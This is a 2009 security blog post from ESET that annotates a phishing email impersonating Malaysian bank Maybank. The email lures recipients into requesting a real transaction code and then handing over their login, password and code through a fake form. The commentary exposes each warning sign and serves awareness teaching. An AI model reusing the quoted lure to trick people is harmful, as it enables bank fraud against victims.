Story image

Phishing example from ESET

02 Mar 09

The scam is somewhat more elaborate than many we see, and it’s worth a little analysis to see what flags we can extract from it for spotting a phisher at work:

From: Maybank Online Account []
[That looks like a genuine address, but it's spoofed: you'd need access to the mail headers to confirm that, though.]

Sent: Friday, 27 February, 2009 1:45 PM
Subject: Dear Account Holder,
[They have your money, but they don't know your name? Lack of personalisation is a pretty reliable indicator of spammed, fraudulent mail.]

Dear maybank2u Account Holder,
[See above: but even if it used your email address, that wouldn't be much better. It's pretty easy to script a spam mailout to insert each  recipient's email address. It's even feasible to parse the address to extract what may be the name of the account holder: however, that can result in curious effects like "Dear jero664..."]

Maybank2u would like to inform you that an increased number of merchants and ATMs in your country have experienced data compromises of payment cards used in their stores and at their ATMs, and that your funds may be at risk.  To protect yourself, please follow the next
steps :
[This is the threat: it's intended to panic you into taking an unconsidered, incautious action like giving your details to a complete stranger. The next section, however, is where it gets interesting. Most phishes tell you to click on a link which will take you to a fake site. This one does something quite different.]

 * Log in into maybank2u online account
[URL removed, but this is the real bank site]

* You must request for TAC online via maybank2u - your TAC will be sent via SMS to the mobile phone number you registered
at the ATM.
( you can find the "request a TAC" button in the right menu of your account "Utilities" )
[As I don't have an account there, I haven't checked this personally, but apparently this involves accessing the genuine site and requesting a Transaction Authorization Code (TAC). This is only supposed to be sent to a mobile phone number which the owner has registered with the bank over the counter. So how does this benefit the scammer?]

    * Logout from your maybank2u account and close the browser.
* When you have received the TAC (Transaction Authorization Code) on your mobile phone, open the secured form attached to email and
submit the requested information
( Account user ID, password and TAC )

[And this is where it all becomes clear. The attached form is, in fact, a JavaScript to a site in China that has nothing whatsoever to do with Maybank. It's just another link to a fake web site. The previous procedure performs threemain functions:

 It obscures the fact that this is just a link to an unvalidated site with no proven connection to the apparent sender.

  • It sets up the victim to acquire all the information the scammer needs to plunder his account

  • It looks as if the procedure is a comprehensive, safe, genuine
    validation procedure (indeed, it apparently really is), so the victim
    is off-guard when the last stage of the con is executed: the fact that the procedure actually seems lengthy and a little bureaucratic reinforces the victims sense of false security.]

  • Please allow 48 hours for processing


[In other words, please give me 48 hours to wreak havoc with your finances.]

Thank you,

maybank2u Risk Management Department
[Have a nice day!]

I’m sure you can see ways in which this approach to be localized to map to where you live!

Thanks to Quah PK for bringing this to my attention.

Director of Malware Research
ESET Global

To find out more about ESET, visit the ESET website.

IDC: NZ IT services market will near $4B in 2023
As cloud adoption grows with every company seeking the competitive advantage it can provide, the opportunities in IT services are expanding in kind.
HPE invests in services with new A/NZ execs 
With IT services spend growing in Australia and New Zealand, HPE is appointing execs for software and technology services in the South Pacific.
NZ’s $3.45bil IT services market fueled by competitive advantage
"With regards to cloud adoption, organisations are prioritising innovation and security over cost and scalability.”
Avaya expands AI offerings with new partnerships
The additions to the ecosystem will enable Avaya to add prioritisation and natural language processing to its UC solutions.
Hillstone CTO's 2019 security predictions
Hillstone Networks CTO Tim Liu shares what key developments could be expected in the areas of security compliance, cloud, security, AI and IoT.
Kiwis make waves in IoT World Cup
A New Zealand company, KotahiNet, has been named as a finalist in the IoT World Cup for its River Pollution Monitoring solution.
Can it be trusted? Huawei’s founder speaks out
Ren Zhengfei spoke candidly in a recent media roundtable about security, 5G, his daughter’s detainment, the USA, and the West’s perception of Huawei.
Oracle Java Card update boosts security for IoT devices
"Java Card 3.1 is very significant to the Internet of Things, bringing interoperability, security and flexibility to a fast-growing market currently lacking high-security and flexible edge security solutions."